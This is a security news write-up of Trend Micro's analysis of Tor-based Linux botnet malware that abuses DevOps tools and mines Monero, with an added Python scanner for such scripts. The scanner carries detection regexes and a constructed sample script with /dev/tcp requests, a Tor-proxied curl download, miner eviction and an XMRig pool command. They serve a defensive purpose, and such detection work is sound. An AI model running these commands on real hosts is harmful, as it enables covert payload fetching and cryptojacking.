Security researchers have spotted Tor-based botnet malware that targets Linux systems and abuses cloud management tools to spread across victims’ networks.
According to Trend Micro, the malware leverages multiple “emerging techniques” to target Linux systems, such as the use of Tor (The Onion Router) through a network of proxies via the SOCKS5 protocol. The actors download tools (such as ss, ps and curl) and malicious scripts onto victim computers over the Tor network.
Moreover, the attackers also abuse DevOps cloud tools (e.g., Ansible, Chef, and Salt Stack) to spread the malware to other systems. The researchers noted this is the first time they have seen attackers abuse infrastructure-as-code (IaC) tools to spread malware.
“Their weaponization of IaC tools suggests that these malicious actors are also well aware of the adoption of new technologies nowadays. More instances of malicious actors hitching on new trends to facilitate their campaigns will likely emerge in the foreseeable future,” Trend Micro wrote in a blog post.
Furthermore, centralized management and DevOps tools are a significant threat when abused, since they run with a higher level of privileges and are used to automate and deploy code and software on many systems throughout the enterprise. Many organizations have already encountered similar threats in the recent SolarWinds and Azure/M365 cyberattacks.
Other techniques used by the actors included the use of Unix shell scripts in their attacks:
“We also found another technique that the malware uses to perform HTTP requests using shell script and Unix system design, as opposed to using binaries like curl or wget, to get more information on the infected systems.”
The researchers further noted that the analyzed malware sample included a cryptocurrency miner, in the form of the Monero (XMR) miner XMRig. The malware is also capable of removing other malicious cryptocurrency miners that may already be installed on the system.
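The behaviours described above (shell-only HTTP requests, Tor over SOCKS5, staging of ss/ps/curl, an XMRig miner that evicts rivals) can be turned into a simple static check over shell scripts found on a host. The following is an added example, not code from Trend Micro or from the analysed sample; the regexes are assumptions about how these behaviours commonly appear in scripts (for instance bash's /dev/tcp pseudo-device as the usual way a script speaks HTTP without curl or wget), and the sample script is constructed.

```python
import re
from typing import Dict, List

# Assumed indicator patterns for the behaviours in the write-up; they are not
# strings taken from the real sample.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # bash can open raw TCP sockets via /dev/tcp, so a script can issue HTTP
    # requests with no curl/wget binary (assumed mechanism for that technique)
    "shell_builtin_http": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    # traffic pushed through Tor via a SOCKS5 proxy (9050 is Tor's default port)
    "tor_socks5_proxy": re.compile(r"socks5h?://|--socks5(?:-hostname)?\b|:9050\b|\.onion\b"),
    # downloading helper binaries such as ss, ps and curl from a remote host
    "tool_staging": re.compile(r"\b(?:curl|wget)\b.*\b(?:ss|ps|curl)\b"),
    # Monero / XMRig mining
    "xmr_miner": re.compile(r"xmrig|stratum\+tcp://|\bmonero\b", re.IGNORECASE),
    # killing competing miners before installing its own
    "miner_eviction": re.compile(r"\b(?:pkill|killall)\b.*\b(?:xmr\w*|miner\w*)", re.IGNORECASE),
}


def scan_script(text: str) -> Dict[str, List[int]]:
    """Return {indicator_name: [1-based line numbers]} for every pattern hit."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def risk_score(hits: Dict[str, List[int]]) -> int:
    """Number of distinct indicator families seen; several in one script is strong evidence."""
    return len(hits)


# Constructed sample (not the real malware): benign lines mixed with indicators.
SAMPLE_SCRIPT = """\
#!/bin/bash
set -e
echo "starting backup"
exec 3<>/dev/tcp/example.invalid/80
curl --socks5-hostname 127.0.0.1:9050 -o /tmp/ss http://example.invalid/ss
pkill -f xmrig || true
/tmp/xmrig -o stratum+tcp://pool.invalid:3333
"""

if __name__ == "__main__":
    found = scan_script(SAMPLE_SCRIPT)
    for name, lines in found.items():
        print(f"{name}: lines {lines}")
    print("distinct indicator families:", risk_score(found))
```

Single hits (a legitimate script using a SOCKS proxy, say) are weak on their own; the score is meant to surface scripts that combine several of these families.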
For mitigation guidance, readers can also check out Security-Focused Configuration Management of Information Systems guidelines (SP 800-128) published by the National Institute of Standards and Technology (NIST).